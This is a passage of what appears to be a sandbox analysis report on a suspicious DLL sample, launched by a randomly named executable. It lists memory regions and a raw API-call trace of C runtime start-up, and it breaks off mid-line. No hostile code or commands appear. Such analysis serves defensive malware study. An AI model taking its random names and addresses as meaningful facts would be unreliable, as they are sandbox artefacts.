1875 start_va = 0x77ba0000 end_va = 0x77c6bfff entry_point = 0x77ba0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 1876 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1877 start_va = 0xc0000 end_va = 0xc0fff entry_point = 0x0 region_type = private name = "private_0x00000000000c0000" filename = "" Region: id = 1878 start_va = 0x580000 end_va = 0x680fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 1879 start_va = 0x1200000 end_va = 0x1dfffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001200000" filename = "" Region: id = 1880 start_va = 0x72db0000 end_va = 0x72db2fff entry_point = 0x72db0000 region_type = mapped_file name = "api-ms-win-core-synch-l1-2-0.dll" filename = "\\Windows\\System32\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-synch-l1-2-0.dll") Region: id = 1881 start_va = 0x72ee0000 end_va = 0x72f24fff entry_point = 0x72ee0000 region_type = mapped_file name = "97328f~1.dll" filename = "\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll") Region: id = 1882 start_va = 0x762e0000 end_va = 0x762f8fff entry_point = 0x762e0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1883 start_va = 0x76700000 end_va = 0x7679ffff entry_point = 0x76700000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 1884 start_va = 0x470000 end_va = 0x51ffff entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 1885 start_va = 0x77510000 end_va = 0x77544fff entry_point = 0x77510000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 1886 start_va = 0x762d0000 end_va = 0x762d5fff entry_point = 0x762d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 1887 start_va = 0xd0000 end_va = 0x10ffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Thread: id = 88 os_tid = 0xc64 [0034.059] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x26f684 | out: lpSystemTimeAsFileTime=0x26f684*(dwLowDateTime=0xe1fce210, dwHighDateTime=0x1d3dfba)) [0034.059] GetCurrentProcessId () returned 0xc60 [0034.059] GetCurrentThreadId () returned 0xc64 [0034.059] GetTickCount () returned 0x17a5d [0034.059] QueryPerformanceCounter (in: lpPerformanceCount=0x26f67c | out: lpPerformanceCount=0x26f67c*=369515344) returned 1 [0034.060] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0034.060] GetProcAddress (hModule=0x761d0000, lpProcName="FlsAlloc") returned 0x7622418d [0034.060] GetProcAddress (hModule=0x761d0000, lpProcName="FlsGetValue") returned 0x76221e16 [0034.060] GetProcAddress (hModule=0x761d0000, lpProcName="FlsSetValue") returned 0x762276e6 [0034.060] GetProcAddress (hModule=0x761d0000, lpProcName="FlsFree") returned 0x76221f61 [0034.061] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0034.061] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0034.061] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0034.061] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0034.061] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0034.061] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0034.061] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0034.061] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0034.061] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0034.061] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0034.062] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0034.062] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0034.062] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0034.062] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0034.062] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0034.062] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0034.063] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0034.063] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0034.063] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0034.063] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0034.063] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0034.063] GetCurrentThreadId () returned 0xc64 [0034.063] GetCommandLineA () returned="\"C:\\Windows\\System32\\goRcteXxZX.exe\" /dll=\"C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL\" /fn_id=InstallW /fn_args=\"DefaultInstall\"" [0034.063] GetEnvironmentStringsW () returned 0x387900* [0034.063] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=992, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 992 [0034.063] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=992, lpMultiByteStr=0x5109f0, cbMultiByte=992, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 992 [0034.063] FreeEnvironmentStringsW (penv=0x387900) returned 1 [0034.064] GetStartupInfoA (in: lpStartupInfo=0x26f5d4 | out: lpStartupInfo=0x26f5d4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\goRcteXxZX.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0034.064] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0034.064] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0034.064] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0034.064] SetHandleCount (uNumber=0x20) returned 0x20 [0034.064] GetLastError () returned 0x0 [0034.064] SetLastError (dwErrCode=0x0) [0034.064] GetLastError () returned 0x0 [0034.064] SetLastError (dwErrCode=0x0) [0034.064] GetLastError () returned 0x0 [0034.064] SetLastError (dwErrCode=0x0) [0034.064] GetACP () returned 0x4e4 [0034.064] GetLastError () returned 0x0 [0034.064] SetLastError (dwErrCode=0x0) [0034.064] IsValidCodePage (CodePage=0x4e4) returned 1 [0034.064] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x26f5b4 | out: lpCPInfo=0x26f5b4) returned 1 [0034.064] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x26f080 | out: lpCPInfo=0x26f080) returned 1 [0034.064] GetLastError () returned 0x0 [0034.065] SetLastError (dwErrCode=0x0) [0034.065] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="", cchSrc=1, lpCharType=0x26f010 | out: lpCharType=0x26f010) returned 1 [0034.065] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x26f494, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0034.065] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x26f494, cbMultiByte=256, lpWideCharStr=0x26edf8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0034.065] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x26f094 | out: lpCharType=0x26f094) returned 1 [0034.065] GetLastError () returned 0x0 [0034.065] SetLastError (dwErrCode=0x0) [0034.065] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr="", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0034.065] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x26f494, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0034.065] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x26f494, cbMultiByte=256, lpWideCharStr=0x26edc8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ⮚矲狰Ā") returned 256 [0034.065] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ⮚矲狰Ā", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0034.065] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ⮚矲狰Ā", cchSrc=256, lpDestStr=0x26ebb8, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0034.065] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchWideChar=256, lpMultiByteStr=0x26f394, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ»±\x1b÷Ìõ&", lpUsedDefaultChar=0x0) returned 256 [0034.065] GetLastError () returned 0x0 [0034.065] SetLastError (dwErrCode=0x0) [0034.065] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x26f494, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0034.065] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x26f494, cbMultiByte=256, lpWideCharStr=0x26ede8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ⮚矲狰Ā") returned 256 [0034.065] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ⮚矲狰Ā", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0034.065] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ⮚矲狰Ā", cchSrc=256, lpDestStr=0x26ebd8, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ") returned 256 [0034.065] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ", cchWideChar=256, lpMultiByteStr=0x26f294, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ»±\x1b÷Ìõ&", lpUsedDefaultChar=0x0) returned 256 [0034.065] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72f1d9a8, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0034.066] GetLastError () returned 0x0 [0034.066] SetLastError (dwErrCode=0x0) [0034.066] GetLastError () returned 0x0 [0034.066] SetLastError (dwErrCode=0x0) [0034.066] GetLastError () returned 0x0 [0034.066] SetLastError (dwErrCode=0x0) [0034.066] GetLastError () returned 0x0 [0034.066] SetLastError (dwErrCode=0x0) [0034.066] GetLastError () returned 0x0 [0034.066] SetLastError (dwErrCode=0x0) [0034.066] GetLastError () returned 0x0 [0034.066] SetLastError (dwErrCode=0x0) [0034.066] GetLastError () returned 0x0 [0034.066] SetLastError (dwErrCode=0x0) [0034.066] GetLastError () returned 0x0 [0034.066] SetLastError (dwErrCode=0x0) [0034.066] GetLastError () returned 0x0 [0034.066] SetLastError (dwErrCode=0x0) [0034.066] GetLastError () returned 0x0 [0034.066] SetLastError (dwErrCode=0x0) [0034.066] GetLastError () returned 0x0 [0034.066] SetLastError (dwErrCode=0x0) [0034.066] GetLastError () returned 0x0 [0034.066] SetLastError (dwErrCode=0x0) [0034.067] GetLastError () returned 0x0 [0034.067] SetLastError (dwErrCode=0x0) [0034.067] GetLastError () returned 0x0 [0034.067] SetLastError (dwErrCode=0x0) [0034.067] GetLastError () returned 0x0 [0034.067] SetLastError (dwErrCode=0x0) [0034.067] GetLastError () returned 0x0 [0034.067] SetLastError (dwErrCode=0x0) [0034.067] GetLastError () returned 0x0 [0034.067] SetLastError (dwErrCode=0x0) [0034.067] GetLastError () returned 0x0 [0034.067] SetLastError (dwErrCode=0x0) [0034.067] GetLastError () returned 0x0 [0034.067] SetLastError (dwErrCode=0x0) [0034.067] GetLastError () returned 0x0 [0034.067] SetLastError (dwErrCode=0x0) [0034.067] GetLastError () returned 0x0 [0034.067] SetLastError (dwErrCode=0x0) [0034.067] GetLastError () returned 0x0 [0034.067] SetLastError (dwErrCode=0x0) [0034.067] GetLastError () returned 0x0 [0034.067] SetLastError (dwErrCode=0x0) [0034.067] GetLastError () returned 0x0 [0034.068] SetLastError (dwErrCode=0x0) [0034.068] GetLastError () returned 0x0 [0034.068] SetLastError (dwErrCode=0x0) [0034.068] GetLastError () returned 0x0 [0034.068] SetLastError (dwErrCode=0x0) [0034.068] GetLastError () returned 0x0 [0034.068] SetLastError (dwErrCode=0x0) [0034.068] GetLastError () returned 0x0 [0034.068] SetLastError (dwErrCode=0x0) [0034.068] GetLastError () returned 0x0 [0034.068] SetLastError (dwErrCode=0x0) [0034.068] GetLastError () returned 0x0 [0034.068] SetLastError (dwErrCode=0x0) [0034.068] GetLastError () returned 0x0 [0034.068] SetLastError (dwErrCode=0x0) [0034.068] GetLastError () returned 0x0 [0034.068] SetLastError (dwErrCode=0x0) [0034.068] GetLastError () returned 0x0 [0034.068] SetLastError (dwErrCode=0x0) [0034.068] GetLastError () returned 0x0 [0034.068] SetLastError (dwErrCode=0x0) [0034.068] GetLastError () returned 0x0 [0034.068] SetLastError (dwErrCode=0x0) [0034.068] GetLastError () returned 0x0 [0034.069] SetLastError (dwErrCode=0x0) [0034.069] GetLastError () returned 0x0 [0034.069] SetLastError (dwErrCode=0x0) [0034.069] GetLastError () returned 0x0 [0034.069] SetLastError (dwErrCode=0x0) [0034.069] GetLastError () returned 0x0 [0034.069] SetLastError (dwErrCode=0x0) [0034.069] GetLastError () returned 0x0 [0034.069] SetLastError (dwErrCode=0x0) [0034.069] GetLastError () returned 0x0 [0034.069] SetLastError (dwErrCode=0x0) [0034.069] GetLastError () returned 0x0 [0034.069] SetLastError (dwErrCode=0x0) [0034.069] GetLastError () returned 0x0 [0034.069] SetLastError (dwErrCode=0x0) [0034.069] GetLastError () returned 0x0 [0034.069] SetLastError (dwErrCode=0x0) [0034.069] GetLastError () returned 0x0 [0034.069] SetLastError (dwErrCode=0x0) [0034.069] GetLastError () returned 0x0 [0034.069] SetLastError (dwErrCode=0x0) [0034.069] GetLastError () returned 0x0 [0034.069] SetLastError (dwErrCode=0x0) [0034.069] GetLastError () returned 0x0 [0034.069] SetLastError (dwErrCode=0x0) [0034.069] GetLastError () returned 0x0 [0034.077] SetLastError (dwErrCode=0x0) [0034.077] GetLastError () returned 0x0 [0034.077] SetLastError 